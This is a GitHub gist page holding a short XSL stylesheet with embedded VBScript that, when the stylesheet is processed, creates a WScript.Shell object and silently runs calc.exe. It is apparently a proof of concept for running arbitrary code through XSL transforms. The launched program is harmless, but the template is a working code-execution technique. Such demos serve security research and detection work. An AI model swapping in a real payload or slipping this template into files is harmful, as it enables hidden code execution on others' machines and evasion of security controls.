Skip to content

Instantly share code, notes, and snippets.

@enigma0x3
Last active December 24, 2022 00:12
Show Gist options
  • Save enigma0x3/08bb53a4e2432e99ed5c134d0943d3b2 to your computer and use it in GitHub Desktop.
Save enigma0x3/08bb53a4e2432e99ed5c134d0943d3b2 to your computer and use it in GitHub Desktop.
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="urn:my-scripts">
<msxsl:script language="VBScript" implements-prefix="user">
function myFunction()
set shell=createobject("wscript.shell")
shell.run "calc.exe",0
myFunction = 0
end function
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:myFunction()"/>
</xsl:template>
</xsl:stylesheet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment